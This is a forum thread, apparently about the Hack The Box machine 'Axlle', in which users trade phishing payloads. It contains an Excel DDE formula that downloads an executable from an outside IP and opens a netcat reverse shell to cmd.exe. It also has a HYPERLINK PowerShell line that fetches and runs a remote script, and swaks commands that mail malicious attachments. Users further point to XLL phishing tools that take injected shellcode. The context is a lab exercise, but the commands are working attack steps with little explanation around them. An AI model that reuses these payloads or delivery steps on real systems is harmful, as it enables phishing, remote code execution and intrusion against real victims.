Posts: 219
Threads: 14
Joined: Apr 2024
Jun 22, 2024, 10:24 PM
(This post was last modified: Jun 22, 2024, 10:25 PM by osamy7593.)
guys put this in the first line in excel file after that test on ur windows after update the security in excel settings u will get a rev shell
cmd|'/C curl -v http://192.168.1.16:8000/ncsec.exe --output ncsec.exe'!nm.A1&cmd|'/C ncsec.exe -nv 192.168.1.16 4444 -e cmd.exe'!nm.A1but when i send it to accounts i don't get
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @/home/o/Downloads/sh.xlsx --server 10.10.11.21 --port 25 This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 22, 2024, 10:25 PM)Dino43Dee Wrote: echo "dummy content" > ~/HTB/addin.xll
(Jun 22, 2024, 09:59 PM)asdasas2132122 Wrote: How did they create the .xll file?
the content like this ?
cmd|'/C curl -v http://192.168.1.16:8000/ncsec.exe --output ncsec.exe'!nm.A1&cmd|'/C ncsec.exe -nv 192.168.1.16 4444 -e cmd.exe'!nm.A1 This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 2
Threads: 0
Joined: Apr 2024
Hello guys, was working on it and saw that macros were disabled here, so I think things like cmd won't work in the excel file. Done some search and saw that "=HYPERLINK('some command')" can work without having macros enabled, I'll try on my windows with a command like "=HYPERLINK("powershell -Command \"Invoke-WebRequest -Uri 'http://IP_ADRESS:PORT/shell.ps1' -OutFile 'C:\Users\Public\shell.ps1'; Start-Process 'C:\Users\Public\shell.ps1'\"")". Can you too ?
Posts: 21
Threads: 0
Joined: Apr 2024
(Jun 22, 2024, 09:10 PM)imassxck Wrote: i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...
XLL works thanks man
Use https://github.com/Octoberfest7/XLL_Phishing instead
Posts: 33
Threads: 1
Joined: Apr 2024
(Jun 22, 2024, 11:19 PM)standby123 Wrote: (Jun 22, 2024, 09:10 PM)imassxck Wrote: i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...
XLL works thanks man
Use https://github.com/Octoberfest7/XLL_Phishing instead
x64?
Posts: 21
Threads: 0
Joined: Apr 2024
(Jun 22, 2024, 11:27 PM)imassxck Wrote: (Jun 22, 2024, 11:19 PM)standby123 Wrote: (Jun 22, 2024, 09:10 PM)imassxck Wrote: i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...
XLL works thanks man
Use https://github.com/Octoberfest7/XLL_Phishing instead
x64?
Yes and include the required libs and add your shellcode in runner function
Posts: 49
Threads: 1
Joined: Jun 2024
Posts: 33
Threads: 1
Joined: Apr 2024
Jun 22, 2024, 11:57 PM
(This post was last modified: Jun 22, 2024, 11:59 PM by imassxck.)
(Jun 22, 2024, 11:29 PM)standby123 Wrote: (Jun 22, 2024, 11:27 PM)imassxck Wrote: (Jun 22, 2024, 11:19 PM)standby123 Wrote: (Jun 22, 2024, 09:10 PM)imassxck Wrote: i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...
XLL works thanks man
Use https://github.com/Octoberfest7/XLL_Phishing instead
x64?
Yes and include the required libs and add your shellcode in runner function
Thanks i got shell
but shell dies quickly.
i used Reverse Shell Generator PowerShell #3 Base64
may you teach me your rev shell ?
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 22, 2024, 11:41 PM)bmoon10 Wrote: well here are other pointers on building a xll file
https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc
u explain how to get xll from this i can't understand This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 21
Threads: 0
Joined: Apr 2024
(Jun 22, 2024, 11:57 PM)imassxck Wrote: (Jun 22, 2024, 11:29 PM)standby123 Wrote: (Jun 22, 2024, 11:27 PM)imassxck Wrote: (Jun 22, 2024, 11:19 PM)standby123 Wrote: (Jun 22, 2024, 09:10 PM)imassxck Wrote: i maked XLL with
https://github.com/zimnyaa/xyrella
and
swaks --to accounts@axlle.htb --from test@test.com --header "Subject: test" --body "test" --attach @addin.xll
is not worked ...
XLL works thanks man
Use https://github.com/Octoberfest7/XLL_Phishing instead
x64?
Yes and include the required libs and add your shellcode in runner function
Thanks i got shell
but shell dies quickly.
i used Reverse Shell Generator PowerShell #3 Base64
may you teach me your rev shell ?
Use metasploit
|